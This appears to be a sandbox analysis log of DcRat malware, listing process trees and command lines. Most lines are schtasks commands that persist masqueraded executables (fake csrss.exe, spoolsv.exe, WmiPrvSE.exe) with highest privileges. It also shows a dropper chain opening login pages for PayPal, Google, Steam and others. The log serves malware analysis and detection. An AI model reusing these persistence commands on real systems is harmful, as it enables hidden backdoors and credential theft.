schtasks.exe /create /tn "43634634634643634634634634" /sc MINUTE /mo 13 /tr "'C:\Windows\es-ES\4363463463464363463463463.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Windows\system\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1460

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "easy" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\it-IT\easy.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2948
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2948 CREDAT:275457 /prefetch:2
  2⤵
  PID:3300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\SystemID\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "easye" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Mail\fr-FR\easy.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "97419" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\9741.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1608
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1608 CREDAT:275457 /prefetch:2
  2⤵
  PID:612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "9741" /sc ONLOGON /tr "'C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\9741.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "97419" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\9741.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "easye" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\fr-FR\easy.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "easy" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\fr-FR\easy.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Recovery\ebbea1a2-8f1b-11ee-aa93-7ed9061e9c39\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2252

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\ebbea1a2-8f1b-11ee-aa93-7ed9061e9c39\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Recovery\ebbea1a2-8f1b-11ee-aa93-7ed9061e9c39\WmiPrvSE.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\Program Files\Mozilla Firefox\fonts\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\fonts\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files\Mozilla Firefox\fonts\dllhost.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\SystemID\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\SystemID\spoolsv.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1716
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1716 CREDAT:275457 /prefetch:2
  2⤵
  PID:2140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Msblockreview" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Msblockreview.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2840
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2840 CREDAT:275457 /prefetch:2
  2⤵
  PID:3140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MsblockreviewM" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Msblockreview.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "easye" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Journal\it-IT\easy.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:3032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "easye" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Journal\it-IT\easy.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\csrss.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "GoG" /sc MINUTE /mo 12 /tr "'C:\Program Files\VideoLAN\VLC\lua\http\Go.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Go" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\lua\http\Go.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "GoG" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\lua\http\Go.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Windows\Fonts\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\Fonts\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Windows\Fonts\System.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Pictures\Sample Pictures\services.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\smss.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\system\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 5 /tr "'C:\Windows\system\explorer.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2552

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Start Menu\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\Start Menu\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Start Menu\sppsvc.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:3044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "4363463463464363463463463" /sc ONLOGON /tr "'C:\Windows\es-ES\4363463463464363463463463.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "43634634634643634634634634" /sc MINUTE /mo 8 /tr "'C:\Windows\es-ES\4363463463464363463463463.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\conhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\conhost.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2264

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\spoolsv.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2716

C:\Users\Admin\AppData\Local\Temp\5302.exe
C:\Users\Admin\AppData\Local\Temp\5302.exe
1⤵
PID:2816
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oz2kq24.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oz2kq24.exe
  2⤵
  PID:2212
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pY9UJ39.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pY9UJ39.exe
    3⤵
    PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1ai66vE9.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1ai66vE9.exe
      4⤵
      PID:2100
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
        5⤵
        
        PID:1800
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1800 CREDAT:275457 /prefetch:2
        6⤵
        
        PID:2296
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
        5⤵
        Executes dropped EXE
        
        PID:1508
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1508 CREDAT:275457 /prefetch:2
        6⤵
        
        PID:3116
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.paypal.com/signin
        5⤵
        
        PID:2948
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1772
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.epicgames.com/id/login
        5⤵
        
        PID:2888
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://steamcommunity.com/openid/loginform
        5⤵
        
        PID:2840
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://twitter.com/i/flow/login
        5⤵
        
        PID:2496
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://store.steampowered.com/login
        5⤵
        
        PID:1716
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login
        5⤵
        
        PID:1608
    - - C:\Windows\system32\makecab.exe
        
        "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231227063633.log C:\Windows\Logs\CBS\CbsPersist_20231227063633.cab
        5⤵
        
        PID:3852
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Yk875yz.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4Yk875yz.exe
      4⤵
      PID:1096
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 2536
        5⤵
        Program crash
        
        PID:4204
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6se1RB2.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6se1RB2.exe
    3⤵
    PID:1164
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Pq3Ap87.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Pq3Ap87.exe
  2⤵
  PID:324

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2496 CREDAT:275457 /prefetch:2
1⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
1⤵
PID:3364
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:3468

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
1⤵
- DcRat
- Creates scheduled task(s)
PID:3508

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
1⤵
PID:3480

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2888 CREDAT:275457 /prefetch:2
1⤵
PID:3176

C:\Windows\system32\taskeng.exe
taskeng.exe {ED045C18-93B9-41C0-AAC6-4388F7D6628B} S-1-5-21-3470981204-343661084-3367201002-1000:GLTGRJAG\Admin:Interactive:[1]
1⤵
PID:4172
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:5068
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:5044
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:4684
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4812
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:1832
- C:\Users\Admin\AppData\Roaming\buaewfs
  C:\Users\Admin\AppData\Roaming\buaewfs
  2⤵
  PID:5016
- - C:\Users\Admin\AppData\Roaming\buaewfs
    C:\Users\Admin\AppData\Roaming\buaewfs
    3⤵
    PID:4140
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:4836
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:4544
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4424
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:4548
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:1720
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1148
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:4456
- C:\Users\Admin\Start Menu\sppsvc.exe
  "C:\Users\Admin\Start Menu\sppsvc.exe"
  2⤵
  PID:3568
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:1212
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:4116
- C:\Program Files\Windows Mail\fr-FR\easy.exe
  "C:\Program Files\Windows Mail\fr-FR\easy.exe"
  2⤵
  PID:4800
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:3780
- C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe
  "C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe"
  2⤵
  PID:240
- C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\9741.exe
  "C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\9741.exe"
  2⤵
  PID:4288
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:4304
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:1124
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:1828
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:1776
- C:\SystemID\spoolsv.exe
  C:\SystemID\spoolsv.exe
  2⤵
  PID:4596
- C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Msblockreview.exe
  "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Msblockreview.exe"
  2⤵
  PID:4600
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:2548
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3932
- C:\Users\Public\Pictures\Sample Pictures\services.exe
  "C:\Users\Public\Pictures\Sample Pictures\services.exe"
  2⤵
  PID:4732
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:4640
- - C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    3⤵
    PID:3700
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:4108
- C:\Recovery\ebbea1a2-8f1b-11ee-aa93-7ed9061e9c39\WmiPrvSE.exe
  C:\Recovery\ebbea1a2-8f1b-11ee-aa93-7ed9061e9c39\WmiPrvSE.exe
  2⤵
  PID:2784
- C:\Windows\system\explorer.exe
  C:\Windows\system\explorer.exe
  2⤵
  PID:4404
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:2572
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:3344
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:4696
- C:\Program Files\Mozilla Firefox\fonts\dllhost.exe
  "C:\Program Files\Mozilla Firefox\fonts\dllhost.exe"
  2⤵
  PID:4364
- C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe
  C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe --Task
  2⤵
  PID:2028
- - C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe
    C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe --Task
    3⤵
    PID:1212
- C:\Program Files\Windows Mail\fr-FR\easy.exe
  "C:\Program Files\Windows Mail\fr-FR\easy.exe"
  2⤵
  PID:4352
- C:\Users\Admin\Start Menu\sppsvc.exe
  "C:\Users\Admin\Start Menu\sppsvc.exe"
  2⤵
  PID:3040
- C:\Program Files (x86)\Internet Explorer\it-IT\conhost.exe
  "C:\Program Files (x86)\Internet Explorer\it-IT\conhost.exe"
  2⤵
  PID:2284
- C:\Program Files\VideoLAN\VLC\lua\http\Go.exe
  "C:\Program Files\VideoLAN\VLC\lua\http\Go.exe"
  2⤵
  PID:240
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:2756
- C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\csrss.exe
  "C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\csrss.exe"
  2⤵
  PID:1936
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:3836
- C:\Windows\es-ES\4363463463464363463463463.exe
  C:\Windows\es-ES\4363463463464363463463463.exe
  2⤵
  PID:2388
- C:\Users\Admin\AppData\Roaming\buaewfs
  C:\Users\Admin\AppData\Roaming\buaewfs
  2⤵
  PID:1392
- - C:\Users\Admin\AppData\Roaming\buaewfs
    C:\Users\Admin\AppData\Roaming\buaewfs
    3⤵
    PID:804
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:2196
- C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\9741.exe
  "C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\9741.exe"
  2⤵
  PID:5032
- C:\Windows\Fonts\System.exe
  C:\Windows\Fonts\System.exe
  2⤵
  PID:3960
- C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\smss.exe
  "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\smss.exe"
  2⤵
  PID:4576
- C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe
  "C:\Program Files\VideoLAN\VLC\lua\sd\lsm.exe"
  2⤵
  PID:3816
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:2284
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:1840
- C:\SystemID\spoolsv.exe
  C:\SystemID\spoolsv.exe
  2⤵
  PID:2320
- C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Msblockreview.exe
  "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\Msblockreview.exe"
  2⤵
  PID:1904
- C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe
  C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe --Task
  2⤵
  PID:5048
- - C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe
    C:\Users\Admin\AppData\Local\4f3fe6ac-979b-4df8-b348-19a5ddbe614f\9741.exe --Task
    3⤵
    PID:1064
- C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
  C:\Users\Admin\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
  2⤵
  PID:3244
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:3564
- C:\ProgramData\pinterests\XRJNZC.exe
  C:\ProgramData\pinterests\XRJNZC.exe
  2⤵
  PID:3736
- C:\Users\Public\Pictures\Sample Pictures\services.exe
  "C:\Users\Public\Pictures\Sample Pictures\services.exe"
  2⤵
  PID:2800
- C:\Users\Admin\Start Menu\sppsvc.exe
  "C:\Users\Admin\Start Menu\sppsvc.exe"
  2⤵
  PID:3984
- C:\Program Files\Windows Mail\fr-FR\easy.exe
